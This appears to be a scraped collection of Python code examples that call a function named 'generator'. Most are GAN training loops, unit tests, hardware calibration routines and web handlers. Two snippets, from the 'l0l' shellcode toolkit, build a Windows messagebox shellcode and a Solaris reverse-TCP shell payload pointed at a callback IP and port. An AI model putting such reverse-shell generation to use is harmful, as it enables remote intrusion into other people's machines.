Example #1
0
def evolutionary_arms_race(raw_images):
    """Run one adversarial training step: discriminator first, then generator.

    Relies on module-level globals: generator, discriminator,
    discriminator_loss, generator_loss, the two optimizers, batch_size
    and noise_dim.
    """
    # Map raw images into the discriminator's expected [-1, 1] range.
    real_images = raw_images * 2. - 1.

    noise = np.random.normal(-1., 1., size=[batch_size, noise_dim]).astype(np.float32)

    # --- Discriminator update ---
    with tf.GradientTape() as tape:
        fakes = generator(noise, is_training=True)
        score_fake = discriminator(fakes, is_training=True)
        score_real = discriminator(real_images, is_training=True)
        loss_discriminator = discriminator_loss(score_fake, score_real)

    disc_vars = discriminator.trainable_variables
    optimizer_discriminator.apply_gradients(
        zip(tape.gradient(loss_discriminator, disc_vars), disc_vars))

    # --- Generator update (reuses the same noise batch) ---
    with tf.GradientTape() as tape:
        fakes = generator(noise, is_training=True)
        loss_generator = generator_loss(discriminator(fakes, is_training=True))

    gen_vars = generator.trainable_variables
    optimizer_generator.apply_gradients(
        zip(tape.gradient(loss_generator, gen_vars), gen_vars))

    return loss_generator, loss_discriminator
Example #2
0
    def _step(self, images: tf.Tensor, batch_size: int):
        """Run a single GAN training step on one batch of real images."""
        latent = tf.random.normal([batch_size, self.noise_dim])
        gen = self.generator.model
        disc = self.discriminator.model

        # Record both forward passes on separate tapes so each network
        # gets its own gradients.
        with tf.GradientTape() as g_tape, tf.GradientTape() as d_tape:
            fakes = gen(latent, training=True)

            real_logits = disc(images, training=True)
            fake_logits = disc(fakes, training=True)

            g_loss = self.generator.loss(fake_logits)
            d_loss = self.discriminator.loss(real_logits, fake_logits)
            tf.keras.backend.print_tensor(g_loss, "GEN")
            tf.keras.backend.print_tensor(d_loss, "DISC")

        g_grads = g_tape.gradient(g_loss, gen.trainable_variables)
        d_grads = d_tape.gradient(d_loss, disc.trainable_variables)

        self.generator.optimizer.apply_gradients(
            zip(g_grads, gen.trainable_variables))
        self.discriminator.optimizer.apply_gradients(
            zip(d_grads, disc.trainable_variables))
Example #3
0
 def test_generatorB(self):
     """Generator B (seed 8921, factor 48271) yields the known first 5 values."""
     expected = [430625591, 1233683848, 1431495498, 137874439, 285222916]
     genB = generator(5, 8921, 48271)
     self.assertEqual(list(genB), expected)
Example #4
0
 def test_generatorA(self):
     """Generator A (seed 65, factor 16807) yields the known first 5 values."""
     expected = [1092455, 1181022009, 245556042, 1744312007, 1352636452]
     genA = generator(5, 65, 16807)
     self.assertEqual(list(genA), expected)
Example #5
0
def calibration(obj):
    """Run the FPGA calibration routine and collect step-minus-base values.

    Launches the Calibration instruction list through the firmware interface
    and, on success, pairs up consecutive type_ID==0 packets: the first of
    each pair is the base value, the second the step value, and their
    difference is appended to cal_values.

    Args:
        obj: Hardware-interface object exposing register, interfaceFW,
            COM_port and add_to_interactive_screen.
    """
    # NOTE(review): `start` is never read afterwards — dead timing probe?
    start = time.time()
    # Build the calibration instruction list; items are echoed for debugging.
    output = generator("Calibration", 0, obj.register)
    for i in output[0]:
        print i
    file_name = "./routines/Calibration/FPGA_instruction_list.txt"
    output = obj.interfaceFW.launch(obj.register, file_name, obj.COM_port)

    cal_values = []

    if output[0] == "Error":
        # Report the failure on the interactive screen instead of raising.
        text = "%s: %s\n" % (output[0], output[1])
        obj.add_to_interactive_screen(text)
    else:
        # flag alternates 0/1 so type_ID==0 packets pair up as base/step.
        flag = 0
        print len(output[0])
        for i in output[0]:
            if i.type_ID == 0:
                if flag == 0:
                    # Packet data bits are concatenated and read as binary.
                    base_value = int(''.join(map(str, i.data)), 2)
                    print "Base value: %d" % base_value
                    flag = 1
                else:
                    step_value = int(''.join(map(str, i.data)), 2)
                    print "Step value: %d" % step_value
                    cal_value = step_value - base_value
                    print "Cal value: %d" % cal_value
                    cal_values.append(cal_value)

    print cal_values
Example #6
0
def train(image_path, mask_path):
    """Fit the U-Net on preprocessed image/mask data and save its weights."""
    print('load data>>>>')
    image_train, image_valid, mask_train, mask_valid = preprocess_data_train(
        image_path, mask_path, size=64, replica=3, split=True)

    print('data loading complete!')

    print('model loaded>>>>')
    print('fitting model>>>>')
    config = tf.ConfigProto()
    # Grab GPU memory on demand rather than all at once.
    config.gpu_options.allow_growth = True
    with tf.Session(graph=tf.get_default_graph(), config=config) as sess:
        K.set_session(sess)
        sess.run(tf.global_variables_initializer())
        os.environ["CUDA_VISIBLE_DEVICES"] = "0, 1"
        early_stop = EarlyStopping(patience=4)

        model = unet(lr=1e-4)
        model.summary()
        # Stream training batches from the generator; validate on the
        # held-out arrays directly.
        model.fit_generator(
            generator=generator(image_train, mask_train),
            steps_per_epoch=len(image_train),
            epochs=10,
            validation_data=[image_valid, mask_valid],
            verbose=1,
            callbacks=[early_stop])
        model.save_weights('./weight.h5')
Example #7
0
def view(generator, state):
    """Generate one image from *state*, save it to test.png and display it."""
    image = generator(state[0,:,:,:])
    frame = tf.squeeze(image).numpy()
    # Clamp to [0, 1] and scale to 8-bit range for the PNG on disk.
    cv2.imwrite("test.png", 255 * np.clip(frame, 0, 1))
    cv2.imshow('Generated', frame)
    cv2.waitKey(0)
    cv2.destroyAllWindows()
Example #8
0
def train_batch(generator, discriminator, batch_real, epoch, i):
    """One GAN batch: train the discriminator, then the generator."""
    n_real = batch_real.shape[0]

    # ---- Discriminator update ----
    with tf.GradientTape() as tape:
        # Build a combined real/fake batch with matching labels.
        latent_state = tf.random.normal([n_real, generator.latent_dimension])
        batch_fake = generator(latent_state)
        batch = tf.concat([batch_real, batch_fake], axis=0)
        labels = tf.concat([tf.fill((n_real, 1), k_real),
            tf.fill((n_real, 1), k_fake)] , axis=0)

        prediction = discriminator(batch)
        loss = discriminator.loss(prediction, labels)
        if (epoch % 2 == 0 and i % 10 == 0):
            print("DISCRIMINATOR LOSS, epoch " + str(epoch) + " batch " + str(i) + ": " + str(loss))

    grads = tape.gradient(loss, discriminator.trainable_variables)
    discriminator.optimizer.apply_gradients(zip(grads, discriminator.trainable_variables))

    # ---- Generator update ----
    # The generator may be trained for several iterations per
    # discriminator step; currently just one.
    k_generator_iterations = 1
    for k in range(k_generator_iterations):
        with tf.GradientTape() as tape:
            # Fake data only, twice the real batch size.
            latent_state = tf.random.normal([n_real * 2, generator.latent_dimension])
            batch = generator(latent_state)
            labels = tf.fill((batch.shape[0], 1), k_fake)

            prediction = discriminator(batch)
            # Negated discriminator loss: the generator maximizes it.
            loss = -discriminator.loss(prediction, labels)
        if (k == 0 and epoch % 2 == 0 and i % 10 == 0):
            print("GENERATOR LOSS, epoch " + str(epoch) + " batch " + str(i) + ": " + str(loss))

        grads = tape.gradient(loss, generator.trainable_variables)
        generator.optimizer.apply_gradients(zip(grads, generator.trainable_variables))
Example #9
0
def generate_fake_images(generator, batch_size, noise_v_size, device,
                         images_save_path):
    """Sample a batch of latent vectors, run the generator, save each image.

    Args:
        generator: Callable mapping a (batch, noise_v_size, 1, 1) noise
            tensor to a batch of images.
        batch_size: Number of images to generate.
        noise_v_size: Length of the latent noise vector.
        device: Torch device the noise is created on.
        images_save_path: Directory the PNGs are written to (0.png, 1.png, ...).
    """
    noise = torch.randn(batch_size, noise_v_size, 1, 1, device=device)
    fake_images = generator(noise).detach().cpu()
    # enumerate() replaces the hand-rolled `count` counter of the original.
    for count, image in enumerate(fake_images):
        vutils.save_image(image, f"{images_save_path}/{count}.png")
Example #10
0
 def handle_nested(self, name, generator):
     """Build the nested property *name* via *generator*.

     On GeneratorExit the cached raw data entry is dropped and the
     plain attribute value is returned instead.
     """
     if name != "ids":
         self.client.logger.debug(
             "%s building nested property '%s'", self, name)
     try:
         built = generator(self.client, self._data[name], self)
     except GeneratorExit:
         # Discard the stale entry and fall through to the attribute.
         del self._data[name]
         self.client.logger.error("GeneratorExit during %s", name)
     else:
         return built
     return getattr(self, name)
Example #11
0
def train():
    """Build, train and persist the homography network.

    Configuration comes entirely from the module-level FLAGS object
    (num_classes, dropout_keep_prob, init_learning_rate, warp_func,
    batch_size, samples_per_archive, num_epochs, num_val_samples).
    Writes the model architecture as JSON, per-epoch checkpoints, and the
    final weights under ./checkpoints/.
    """
    # Init Keras Model here
    model = homography_net(num_classes=FLAGS.num_classes,
                           dropout_keep_prob=FLAGS.dropout_keep_prob)
    model.compile(optimizer=SGD(lr=FLAGS.init_learning_rate, momentum=0.9),
                  loss=SMSE,
                  metrics=[mean_corner_err])

    model_json = model.to_json()
    with open("homography_net_" + FLAGS.warp_func + "_model.json",
              "w") as json_file:
        json_file.write(model_json)  # Save model architecture
    time_str = datetime.datetime.now().isoformat()
    print("{}: Model saved as json.".format(time_str))

    # Trainer
    # Callbacks: LR schedule, best-loss checkpointing, TensorBoard logging.
    learning_rate = LearningRateScheduler(halve_lr)
    checkpointer = ModelCheckpoint(filepath="./checkpoints/" +
                                   FLAGS.warp_func + "_epoch_{epoch:02d}.h5",
                                   period=1,
                                   verbose=1,
                                   save_best_only=True,
                                   mode='min',
                                   monitor='loss')
    tensorboard = TensorBoard(log_dir='./logs',
                              batch_size=FLAGS.batch_size,
                              write_images=True)
    # Train and validate from streaming generators over the dataset folders.
    # NOTE(review): assumes each archive holds 64 samples (the 64 below) —
    # confirm against the dataset layout.
    model.fit_generator(
        generator('./dataset/train_' + FLAGS.warp_func, FLAGS.batch_size),
        steps_per_epoch=int(
            np.floor((64 * FLAGS.samples_per_archive) / FLAGS.batch_size)),
        epochs=FLAGS.num_epochs,
        verbose=1,
        validation_data=generator('./dataset/val_' + FLAGS.warp_func,
                                  FLAGS.batch_size),
        validation_steps=int(np.floor(FLAGS.num_val_samples /
                                      FLAGS.batch_size)),
        callbacks=[checkpointer, tensorboard, learning_rate])
    # Save the final trained model here
    model.save_weights(
        'checkpoints/homography_model_weights.h5')  # Save model weights
    time_str = datetime.datetime.now().isoformat()
    print("{}: Training complete, model saved.".format(time_str))
Example #12
0
 def build_generator(self, name, args=None):
     """Build and return the generator registered under *name*.

     Args:
         name: Key into self.generators.
         args: Optional dict of keyword arguments for the factory.

     Returns:
         The constructed generator instance.

     Raises:
         ValueError: If *name* is unknown or construction fails.
     """
     args = args or {}
     generator = self.generators.get(name)
     if not generator:
         raise ValueError('Generator "{}" does not exist'.format(name))
     try:
         return generator(**args)
     except Exception as e:
         # Chain the original exception so the root cause is preserved.
         raise ValueError('Generator "{}" could not be created: {}'.format(
             name, str(e))) from e
Example #13
0
 def refinder(self, reftype, refname):
     """Resolve a reference to its rendered body.

     Required by translator; relies on self.ref_map. Returns the literal
     "[reftype:refname]" text when the reference cannot be resolved.
     """
     fallback = "[%s:%s]" % (reftype, refname)
     reftype = self.reftype_trans(reftype)
     if reftype is None:  # unrecognised reference type
         return fallback
     inlib = self.sub_dict(self.ref_map[reftype])
     obj = generator(inlib[refname], reftype)
     return fallback if obj is None else obj.view_body
Example #14
0
 def refinder(self, reftype, refname):
     '''Look up a [reftype:refname] reference and return its view body.

     Required by translator; relies on self.ref_map. Falls back to the
     bracketed reference text on any resolution failure.
     '''
     when_error = '[%s:%s]' % (reftype, refname)
     translated = self.reftype_trans(reftype)
     if translated is None:
         # Unknown reference type: echo the reference back.
         return when_error
     library = self.sub_dict(self.ref_map[translated])
     obj = generator(library[refname], translated)
     if obj is None:
         return when_error
     return obj.view_body
Example #15
0
def train_step(images, masks):
    """One training step of the inpainting GAN.

    Augments the batch, masks it, runs generator and discriminator under
    separate gradient tapes, and applies both optimizers. Relies on
    module-level globals: BATCH_SIZE, generator, discriminator, their
    losses, optimizers and metric accumulators.

    Returns:
        (masked, fake_output, real_output, real_loss, fake_loss) where
        masked is the (img_masked, masks, noise) triple fed to the generator.
    """

    # --- Images processing ----
    def process_image(img, masks):
        # Randomly transform image
        img = tf.image.random_flip_left_right(img)
        img = tf.image.random_flip_up_down(img)
        # 0-3 quarter-turn rotations.
        rand_nb = random.randint(0, 3)
        for i in range(rand_nb):
            img = tf.image.rot90(img)

        # Generate and apply mask
        img_masked = img * masks

        # Generate random noise
        # assumes 256x256 single-channel images — TODO confirm
        noise = tf.random.normal([BATCH_SIZE, 256, 256, 1])

        return img, (img_masked, masks, noise)

    # Process all images and put them in 2 tables
    full, masked = process_image(images, masks)
    # print(" >> images processing done << : ", images)

    # ---- Gradient descent ----
    with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:
        # The generator receives the (masked image, mask, noise) triple.
        generated_images = generator(masked, training=True)

        real_output = discriminator(full, training=True)
        fake_output = discriminator(generated_images, training=True)

        # Generator loss also sees the masked input and the mask itself.
        gen_loss = generator_loss(fake_output, masked[0], generated_images,
                                  masked[1])
        disc_loss, real_loss, fake_loss = discriminator_loss(
            real_output, fake_output)

    gradients_of_generator = gen_tape.gradient(gen_loss,
                                               generator.trainable_variables)
    gradients_of_discriminator = disc_tape.gradient(
        disc_loss, discriminator.trainable_variables)

    generator_optimizer.apply_gradients(
        zip(gradients_of_generator, generator.trainable_variables))
    discriminator_optimizer.apply_gradients(
        zip(gradients_of_discriminator, discriminator.trainable_variables))

    # Accumulate the running loss metrics.
    generator_metric(gen_loss)
    discriminator_metric(disc_loss)

    return masked, fake_output, real_output, real_loss, fake_loss
Example #16
0
def generate_rimed_aggregate(*args, **kwargs):
    """Generate a rimed aggregate particle.
    
    Args:
        monomer_generator: The Generator object used to make the ice 
            crystals.
        N: Number of ice crystals to aggregate.
        align: If True, the aggregate is kept horizontally aligned between
            iterations.
        riming_lwp: Liquid water path that the aggregate is assumed to fall
            through [kg/m^2].
        riming_eff: Riming efficiency (between 0 and 1, default 1); this 
            multiplies the riming_lwp parameter.
        riming_mode: "simultaneous" if the aggregation and riming occur
            simultaneously, or "subsequent" if all aggregation is done first,
            followed by the riming.
        pen_depth: The distance that rime particles are allowed to penetrate
            into the particle.
        seed: Random seed. If not None, this seed is used to initialize the
            random generator.
        lwp_div: See the documentation for generate_rime for details.
        debug: If True, print additional debugging information.
        iter: If True, this function will return an iterator that gives the
            different stages of the aggregation and riming.

    Returns:
        If iter=True, a generator giving the different stages of aggregate
        formation and riming; each iteration returns a list of the particles
        at that stage. If iter=False, returns the final aggregate particle as
        an Aggregate instance (this is equivalent to the final iteration when
        iter=True).
    """
    # dict.pop with a default replaces the original membership-test /
    # delete dance, and avoids shadowing the builtin iter().
    want_iter = kwargs.pop("iter", False)

    if want_iter:
        # Wrap in a generator so generate_rimed_aggregate_iter is only
        # invoked lazily, on the first next() call.
        def _stages():
            yield from generate_rimed_aggregate_iter(*args, **kwargs)
        return _stages()
    else:
        # Drain the iterator; the last yielded list holds the final particle.
        aggs = None
        for aggs in generate_rimed_aggregate_iter(*args, **kwargs):
            pass
        return aggs[0]
Example #17
0
def get_gan_network(generator, discriminator, optimizer):
    """Chain generator and discriminator into one compiled GAN model.

    The combined model outputs both the generated images and the
    discriminator's verdict on them.
    """
    gan_input = Input(shape=(LRDim, LRDim, 3))
    generated_images = generator(gan_input)
    gan_output = discriminator(generated_images)

    gan = Model(inputs=gan_input, outputs=[generated_images, gan_output])
    gan.compile(loss=['mse', 'binary_crossentropy'],
                optimizer=optimizer,
                metrics=[psnr.PSNR, 'accuracy'])
    return gan
 def post(self):
     """Toggle the current user's "like" on the requested object.

     Replies with status 0 on success, 1 when the target is not a
     likeable article type, 2 when the target does not exist.
     """
     handler_para = ObjDoLikePara(self)
     handler_json = ObjDoLikeJson(self)
     usr = self.current_user
     article_obj = generator(handler_para['obj_id'],
                             handler_para['obj_type'])
     if article_obj is None:
         status = 2  # object does not exist
     elif not usr.reverse_like_post(article_obj):
         status = 1  # not an article type
     else:
         status = 0  # success
     handler_json.by_status(status)
     handler_json.write()
Example #19
0
def generate_images_from_zero_noise(generator,
                                    noise_v_size,
                                    device,
                                    images_save_path,
                                    n_samples=100,
                                    n_rows=8,
                                    padding=2,
                                    norm=True,
                                    alpha=0.1):
    """Walk the latent space from the zero vector, saving one image per step.

    Starting from all-zero noise, each iteration adds *alpha* to every
    latent component, generates an image, and saves it as <i>.png.

    Args:
        generator: Callable mapping (1, noise_v_size, 1, 1) noise to an image.
        noise_v_size: Length of the latent noise vector.
        device: Torch device for the noise tensor.
        images_save_path: Directory the PNGs are written to.
        n_samples: Number of images/steps to produce.
        n_rows, padding, norm: Unused; kept for interface compatibility.
        alpha: Latent-space step size added after each sample.
    """
    # NOTE(review): torch.zeros(...) would avoid an unused RNG draw — kept
    # as randn().zero_() so the global RNG state advances identically.
    noise = torch.randn(1, noise_v_size, 1, 1, device=device).zero_()
    # Loop index doubles as the filename counter (the original kept a
    # redundant separate `count` variable).
    for i in range(n_samples):
        fake_image = generator(noise).detach().cpu()
        noise += alpha
        vutils.save_image(fake_image, f"{images_save_path}/{i}.png")
 def post(self):
     """Flip the current user's like state for the requested object."""
     params = ObjDoLikePara(self)
     reply = ObjDoLikeJson(self)
     user = self.current_user
     target = generator(params['obj_id'], 
                        params['obj_type'])
     # Guard clauses: missing object, then non-article type.
     if target is None:
         reply.by_status(2)  # object not found
         reply.write()
         return
     if not user.reverse_like_post(target):
         reply.by_status(1)  # not an article type
         reply.write()
         return
     reply.by_status(0)  # success
     reply.write()
Example #21
0
def train(dataloader, discriminator, generator, optimizer_d, optimizer_g, criterion, device):
    """Standard DCGAN training loop over *dataloader* for num_epochs epochs.

    Relies on module-level globals: num_epochs, real_label, fake_label,
    n_latent_vector, noise_data, train_discriminator, train_generator,
    checkpoint, generator_network, discriminator_network.
    """
    print('Starting the training loop ...')
    for epoch in range(num_epochs):
        generator_losses = []
        discriminator_losses = []
        for i, data in enumerate(dataloader, 1):

            # train the discriminator with real data
            discriminator.zero_grad()
            b_size = data[0].size(0)


            label = torch.full((b_size,), real_label, device=device)
            # presumably train_discriminator runs forward + backward,
            # accumulating gradients for optimizer_d.step() below — confirm
            error_d_real, output_d_real = train_discriminator(data[0], label, discriminator, criterion, device)

            # train the discriminator with fake data
            noise = noise_data(b_size, n_latent_vector).to(device)
            fake = generator(noise)
            # Reuse the label tensor, switching it to the fake label.
            label.fill_(fake_label)
            # detach() keeps the generator out of the discriminator's graph.
            error_d_fake, output_d_fake = train_discriminator(fake.detach(), label, discriminator, criterion, device)

            # total error
            error_discriminator = error_d_fake + error_d_real

            # Update the discriminator's parameters
            optimizer_d.step()

            # train the generator
            generator.zero_grad()
            # Real labels: the generator is rewarded for fooling the critic.
            label.fill_(real_label)
            error_generator, output_g_fake = train_generator(discriminator, fake, label, criterion)
            optimizer_g.step()
            generator_losses.append(error_generator.item())
            discriminator_losses.append(error_discriminator.item())

        print(f'{epoch:<10} {"generator loss:"} {sum(generator_losses)/len(generator_losses)}\
        {"discriminator loss:"} {sum(discriminator_losses)/len(discriminator_losses)}')

        # NOTE(review): checkpoints the global generator_network /
        # discriminator_network, not the generator/discriminator parameters
        # passed to this function — verify this is intentional.
        checkpoint(epoch, generator_network, discriminator_network)
Example #22
0
    def __init__(self,
                 name="trainnetwork",
                 numTracks=10,
                 trackLength=2500,
                 numTrains=10,
                 a=(5, 30),
                 iat=(20, 50),
                 vmax=150):
        """Assemble the train-network DEVS model: generator -> rails -> collector.

        Args:
            name: Model name. NOTE(review): unused — the base class is always
                initialized with "system".
            numTracks: Number of railway segments chained in series.
            trackLength: Length of each segment.
            numTrains: Number of trains the generator emits.
            a: (min, max) acceleration range passed as a_max.
            iat: (min, max) inter-arrival time range for trains.
            vmax: Maximum speed on every segment.
        """
        CoupledDEVS.__init__(self, "system")
        self.lights = numTracks

        # Submodels: one train generator, numTracks rail segments, one collector.
        self.generator = self.addSubModel(
            generator(num_trains=numTrains, IAT=iat, a_max=a))
        self.railways = []
        for x in range(numTracks):
            self.railways.append(
                self.addSubModel(
                    railwaysegment("Rail" + str(x), trackLength, vmax)))

        self.collector = self.addSubModel(collector())

        # Wire the generator to the first segment (query + train flow,
        # plus the acknowledgement back-channel).
        self.connectPorts(self.generator.QUERY, self.railways[0].QUERYRECV)
        self.connectPorts(self.generator.TRAIN, self.railways[0].TRAIN)
        self.connectPorts(self.railways[0].QUERYACK, self.generator.QUERYRECV)

        # Chain each segment to the next: trains and queries forward,
        # acknowledgements backward.
        for x in range(1, self.lights):
            self.connectPorts(self.railways[x - 1].TRAINOUT,
                              self.railways[x].TRAIN)
            self.connectPorts(self.railways[x - 1].QUERYSEND,
                              self.railways[x].QUERYRECV)
            self.connectPorts(self.railways[x].QUERYACK,
                              self.railways[x - 1].QUERYACKRECV)

        # Last segment feeds the collector; its acks flow back upstream.
        self.connectPorts(self.railways[-1].TRAINOUT, self.collector.TRAIN)
        self.connectPorts(self.railways[-1].QUERYSEND,
                          self.collector.QUERYRECV)
        self.connectPorts(self.collector.QUERYACK,
                          self.railways[-1].QUERYACKRECV)
Example #23
0
 def post_comment(self, commentobj):
     """Attach *commentobj* to its parent, publish it, and drop its draft."""
     # Capture the draft key before do_post() runs.
     draft_key = commentobj.uid
     parent = generator(commentobj.father_id, commentobj.father_type)
     parent.lib.comment_list.push(commentobj._id)
     commentobj.do_post()
     del self.lib.drafts_lib[draft_key]
Example #24
0
        l.trainable = flag


# Separate Adam optimizers for the combined GAN and the discriminator.
gan_opt = Adam(lr=0.00009, beta_1=0.5, beta_2=0.999, epsilon=1e-08)
d_opt = Adam(lr=0.00009, beta_1=0.5, beta_2=0.999, epsilon=1e-08)

# Either resume from saved models or build everything from scratch.
if model_checkpoint == 'y':
    print("Loading the saved models: ")
    # NOTE: Windows-style "\\" path separators — assumes a Windows host.
    generator = load_model(model_path + "\\generator.hd5")
    discriminator = load_model(model_path + "\\discriminator.hd5")
    set_trainable(discriminator, True)
    discriminator.compile(loss='binary_crossentropy', optimizer=d_opt)
    gan = load_model(model_path + "\\gan.hd5",
                     custom_objects={'PSNR': psnr.PSNR})
else:
    # NOTE(review): the factory functions are rebound to their instances
    # here, so `generator`/`discriminator` cannot be constructed again later.
    generator = generator(LRDim, num_residual_blocks)
    discriminator = discriminator(HRDim, d_opt)
    generator = generator.get_generator()
    discriminator = discriminator.get_discriminator()
    gan = get_gan_network(generator, discriminator, gan_opt)

# (Re)compile both models regardless of which branch ran above.
discriminator.compile(loss='binary_crossentropy', optimizer=d_opt)
gan.compile(loss=['mse', 'binary_crossentropy'],
            optimizer=gan_opt,
            metrics=[psnr.PSNR, 'accuracy'])

# Training-loop parameters.
epochs = 50
batch_size = 8

batch_count = len(LRimages) // batch_size
        data_loader = torch.utils.data.DataLoader(database, batch_size=arc.batch_size, shuffle=True)
        num_batches = len(data_loader)

        print(dataAtts.fname)
        print(arc.name)
        for epoch in range(epochs):
            if (epoch % 100 == 0):
                print("Epoch ", epoch)

            for n_batch, real_batch in enumerate(data_loader):
                # 1. Train DdataAtts.fnameiscriminator
                real_data = Variable(real_batch).float()
                if torch.cuda.is_available(): 
                    real_data = real_data.cuda()
                # Generate fake data
                fake_data = generator(random_noise(real_data.size(0))).detach()
                # Train D
                d_error, d_pred_real, d_pred_fake = train_discriminator(d_optimizer, discriminator, loss, real_data, fake_data)

                # 2. Train Generator
                # Generate fake data
                fake_data = generator(random_noise(real_batch.size(0)))
                # Train G
                g_error = train_generator(g_optimizer, discriminator, loss, fake_data)

                # Display Progress

                #if (n_batch) % print_interval == 0:

        # From this line on it's just the saving
        # save_model("generator", epoch, generatorAtts, generator.state_dict(), g_optimizer.state_dict(), loss, dataAtts.fname, arc.name)
Example #26
0
 def getter(self):
     """Resolve and return the object that owns this record."""
     owner_id = self.data['owner_id']
     owner_type = self.data['owner_type']
     return generator(owner_id, owner_type)
Example #27
0
    try:
        float(s)
        return True
    except ValueError:
        return False


print("Input begin, end, step and EPS")
begin, end, step, EPS = input().split()

# Validate every token before converting: each must parse as a float.
for x in begin, end, step, EPS:
    if not RepresentsFloat(x):  # idiomatic truth test instead of "== False"
        raise ValueError("Input values must be float")

begin = float(begin)
end = float(end)
step = float(step)
EPS = float(EPS)

# Build one list via the Iterator class...
iterList = LinkedList()
for x in Iterator(begin, end, step, EPS):
    iterList.push_back(x)

iterList.print()

# ...and another via the generator function; both should print the same range.
genList = LinkedList()
for x in generator(begin, end, step, EPS):
    genList.push_back(x)
print()
genList.print()
Example #28
0
#------------------------------------------------------------------#
#Author  : roissy
#Greetz  : b3mb4m, esw0rmer
#Concat  : [email protected]
#Project : https://github.com/roissy/l0l
#LICENSE : https://github.com/roissy/l0l/blob/master/LICENSE
#------------------------------------------------------------------#

from generator import *

shellcode = generator( "windows", "messagebox", "dfgdfghdsfgdfgsdfdfgfdgfgddgfgdsfagseg666")



b = shellcode.split("\\")

x = 1

p = (len(b)/20)+1
loplop = 1
for i in range((len(b)/20)+1):
    j = b[x:x+20]
    line = ""
    for k in range(len(j)):
        line += "\\"+j[k]
    #print '"'+line+'"+'
    if p != loplop:
        print '"'+line+'"+'
    else:
        print '"'+line+'";'
    x += 20
Example #29
0
#------------------------------------------------------------------#
#Author  : roissy
#Greetz  : b3mb4m, esw0rmer
#Concat  : [email protected]
#Project : https://github.com/roissy/l0l
#LICENSE : https://github.com/roissy/l0l/blob/master/LICENSE
#------------------------------------------------------------------#

from generator import *

# Callback host and port for the reverse shell.
i = "255.255.255.255"
p = "44442"

# Build a Solaris x86 reverse-TCP shellcode for the host/port above.
shellcode = generator("solarisx86", "reverse_tcp", i, p)

print shellcode
Example #30
0
def concecutive_triggers(obj, nr_loops=25):
    timestamp = time.strftime("%Y%m%d_%H%M")
    scan_name = "Consecutive_Triggers"
    file_name = "./routines/%s/FPGA_instruction_list.txt" % scan_name
    output_file = "%s/concecutive_tiggers/%s_concecutive_triggers.dat" % (
        obj.data_folder, timestamp)
    if not os.path.exists(os.path.dirname(output_file)):
        try:
            os.makedirs(os.path.dirname(output_file))
        except OSError as exc:  # Guard against race condition
            print "Unable to create directory"
    open(output_file, 'w').close()

    instruction_text = []
    instruction_text.append("1 Send RunMode")
    instruction_text.append("10 Send EC0")
    instruction_text.append("10 Send BC0")
    instruction_text.append("100 Send_Repeat LV1A 4000 100")
    instruction_text.append("1000 Send ReSync")

    # Write the instructions to the file.
    output_file_name = "./routines/%s/instruction_list.txt" % scan_name
    with open(output_file_name, "w") as mfile:
        for item in instruction_text:
            mfile.write("%s\n" % item)
    # Generate the instruction list for the FPGA.
    generator("Consecutive Triggers", obj.write_BCd_as_fillers, obj.register)

    obj.register[65535].RUN[0] = 1
    obj.write_register(65535)
    time.sleep(1)

    obj.register[130].ECb[0] = 1
    obj.register[130].BCb[0] = 1
    obj.write_register(130)
    time.sleep(1)

    trigger_counter = 0
    data_packet_counter = 0
    hit_counter = 0
    crc_error_counter = 0
    ec_error_counter = 0
    bc_error_counter = 0
    start = time.time()

    for k in range(0, nr_loops):
        trigger_counter += 4000
        previous_EC = 0
        previous_BC = 0
        output = obj.interfaceFW.launch(obj.register,
                                        file_name,
                                        obj.COM_port,
                                        1,
                                        save_data=1,
                                        obj=obj)
        if output[0] == "Error":
            text = "%s: %s\n" % (output[0], output[1])
            obj.add_to_interactive_screen(text)
        else:

            for i in output[3]:
                if i.type == "data_packet":
                    data_packet_counter += 1
                    if i.hit_found == 1:
                        hit_counter += 1
                    if i.crc_error == 1:
                        crc_error_counter += 1
                    ec_diff = i.EC - previous_EC
                    if ec_diff != 1:
                        print "->EC error"
                        print "Previous EC: %d" % previous_BC
                        print "Current EC: %d" % i.BC
                        ec_error_counter += 1
                    previous_EC = i.EC
                    bc_diff = i.BC - previous_BC
                    if bc_diff != 100:
                        print "->BC error"
                        print "Previous BC: %d" % previous_BC
                        print "Current BC: %d" % i.BC
                        bc_error_counter += 1
                    previous_BC = i.BC

        stop = time.time()
        run_time = (stop - start) / 60
        result = []
        result.append("-> %d Triggers sent." % trigger_counter)
        result.append("%d Data packets received." % data_packet_counter)
        result.append("CRC errors: %d" % crc_error_counter)
        result.append("EC errors: %d" % ec_error_counter)
        result.append("BC errors: %d" % bc_error_counter)
        result.append("Hits found: %d" % hit_counter)
        result.append("Time elapsed: %f min" % run_time)
        result.append("***************")

        with open(output_file, "a") as myfile:
            for line in result:
                print line
                myfile.write("%s\n" % line)

    obj.register[65535].RUN[0] = 0
    obj.write_register(65535)
    time.sleep(1)

    obj.register[130].ECb[0] = 0
    obj.register[130].BCb[0] = 0
    obj.write_register(130)
    time.sleep(1)
Example #31
0
def train_epoch(models,
                optimizer,
                loader,
                batch_size,
                device,
                scale_factor=0.25):
    """Run one training epoch of the adversarial deformation/segmentation model.

    Alternates a discriminator step (on real label pairs) with a joint
    generator+segmentator step whose objective combines segmentation,
    adversarial, invertibility, smoothness and diversity terms.

    Args:
        models: dict with 'seg', 'gen', 'dis' torch modules.
        optimizer: dict with 'gs' (generator+segmentator) and 'd'
            (discriminator) optimizers.
        loader: iterable yielding
            (x, y, x_1, x_2, y_1, y_2, s, k_1, k_2, inter_subject,
            intra_subject) batches.
        batch_size: unused here; kept for interface compatibility.
        device: torch device the batch tensors are moved to.
        scale_factor: scaling applied to the predicted deformation fields.

    Returns:
        (models, optimizer): the same components repacked into fresh dicts.
    """
    # Weights of the loss terms in the total generator/segmentator objective.
    lambda_1 = 0.5  # adversarial
    lambda_2 = 1    # invertibility
    lambda_3 = 10   # smoothness
    lambda_4 = 1    # diversity

    warper = Warper(device)
    segmentator = models['seg'].train()
    generator = models['gen'].train()
    discriminator = models['dis'].train()

    dis_criterion = torch.nn.CrossEntropyLoss()
    ssim_criterion = pytorch_ssim.SSIM3D(window_size=11)
    classes_weights = [1 / 33, 1 / 33, 1 / 33, 10 / 33, 10 / 33, 10 / 33]
    dice_criterion = Dice_Loss()
    smooth_criterion = Gradient_Loss()
    focal_criterion = Focal_Loss(0.7, 0.3, 4 / 3, weights=classes_weights)

    optimizer_gs = optimizer['gs']
    optimizer_d = optimizer['d']

    run_dis_loss = 0
    run_adv_loss = 0
    run_inv_loss = 0
    # BUG FIX: was initialised as `run_smooth` but accumulated below as
